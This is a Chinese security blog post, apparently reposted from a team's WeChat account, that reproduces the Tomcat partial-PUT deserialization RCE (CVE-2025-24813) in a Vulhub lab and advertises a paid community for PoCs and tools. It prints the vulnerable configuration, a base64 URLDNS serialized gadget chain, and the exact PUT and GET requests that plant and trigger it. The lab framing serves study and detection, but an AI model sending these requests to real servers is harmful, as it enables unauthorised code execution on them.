扫码加内部知识圈
获取漏洞资料
Vulhub靶场复现:Tomcat远程代码执行漏洞(CVE-2025-24813),附检测插件
靶场地址如下,还是热乎的:
https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2025-24813
漏洞详情
Apache Tomcat 是一个广泛使用的开源Java Servlet、JavaServer Pages、Java Expression Language和WebSocket技术的实现。
在 Tomcat 版本 9.x ~ 9.0.97,10.x ~ 10.1.34, 11.x ~ 11.0.2 中,当 Tomcat 同时配置了可写的 DefaultServlet(readonly=false)和基于文件的会话持久化时,攻击者可以向服务器写入任意文件,并通过操作 JSESSIONID cookie 触发这些文件的反序列化,最终导致远程代码执行。
<servlet>
<servlet-name>default</servlet-name>
<servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
<init-param>
<param-name>debug</param-name>
<param-value>0</param-value>
</init-param>
<init-param>
<param-name>listings</param-name>
<param-value>false</param-value>
</init-param>
<init-param>
<param-name>readonly</param-name>
<param-value>false</param-value>
</init-param>
<load-on-startup>1</load-on-startup>
</servlet>
其次,Tomcat配置了基于文件的Session持久化:
<ManagerclassName="org.apache.catalina.session.PersistentManager">
<StoreclassName="org.apache.catalina.session.FileStore"/>
</Manager>
这两种配置都使用相同的默认存储路径:
$CATALINA_BASE/work/Catalina/localhost/ROOT
当发送不完全的PUT请求(使用Content-Range头)时,Tomcat会将文件路径中的分隔符(/)转换为句点(.),并将文件临时存储在会话存储目录中。利用这个特效,我们可以将恶意序列化对象写入此临时文件中。
正文开始
把环境启动起来,首页如下图
这里尝试利用URLDNS gadget类打dnslog
生成base64格式的序列化利用链
rO0ABXNyACLBqsGhwbbBocCuwbXBtMGpwazArsGIwaHBs8GowY3BocGwBQfawcMWYNEDAAJGABTBrMGvwaHBpMGGwaHBo8G0wa/BskkAEsG0wajBssGlwbPBqMGvwazBpHhwP0AAAAAAAAx3CAAAABAAAAABc3IAGMGqwaHBtsGhwK7BrsGlwbTArsGVwZLBjJYlNzYa/ORyAwAHSQAQwajBocGzwajBg8GvwaTBpUkACMGwwa/BssG0TAASwaHBtcG0wajBr8GywanBtMG5dAAkwYzBqsGhwbbBocCvwazBocGuwafAr8GTwbTBssGpwa7Bp8C7TAAIwabBqcGswaVxAH4AA0wACMGowa/Bs8G0cQB+AANMABDBsMGywa/BtMGvwaPBr8GscQB+AANMAAbBssGlwaZxAH4AA3hw//////////90ACbBqcGnwa7BtsG5wbPBssGrwbbBosCuwaTBp8GywajAs8CuwaPBrnQAAHEAfgAFdAAIwajBtMG0wbBweHQANMGowbTBtMGwwLrAr8CvwanBp8GuwbbBucGzwbLBq8G2waLArsGkwafBssGowLPArsGjwa54
PUT /deserialize/session HTTP/1.1
Host: 192.168.172.131:8080
Content-Length: 1234
Content-Range: bytes 0-5/10
{{base64dec(rO0ABXNyACLBqsGhwbbBocCuwbXBtMGpwazArsGIwaHBs8GowY3BocGwBQfawcMWYNEDAAJGABTBrMGvwaHBpMGGwaHBo8G0wa/BskkAEsG0wajBssGlwbPBqMGvwazBpHhwP0AAAAAAAAx3CAAAABAAAAABc3IAGMGqwaHBtsGhwK7BrsGlwbTArsGVwZLBjJYlNzYa/ORyAwAHSQAQwajBocGzwajBg8GvwaTBpUkACMGwwa/BssG0TAASwaHBtcG0wajBr8GywanBtMG5dAAkwYzBqsGhwbbBocCvwazBocGuwafAr8GTwbTBssGpwa7Bp8C7TAAIwabBqcGswaVxAH4AA0wACMGowa/Bs8G0cQB+AANMABDBsMGywa/BtMGvwaPBr8GscQB+AANMAAbBssGlwaZxAH4AA3hw//////////90ACbBqcGnwa7BtsG5wbPBssGrwbbBosCuwaTBp8GywajAs8CuwaPBrnQAAHEAfgAFdAAIwajBtMG0wbBweHQANMGowbTBtMGwwLrAr8CvwanBp8GuwbbBucGzwbLBq8G2waLArsGkwafBssGowLPArsGjwa54)}}
GET / HTTP/1.1
Host: 192.168.172.131:8080
Cookie: JSESSIONID=.deserialize
内部知识圈子1周年啦!最后6天优惠!
渗透实战、src挖掘文档、漏洞poc、漏洞利用工具等尽在内部圈子社区【安全渗透感知大家族】
01 内部社区
02 内部社区
C4安全团队公开交流群
END
关注Code4th安全团队
了解更多网络安全内容~
原文始发于微信公众号(C4安全团队):[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论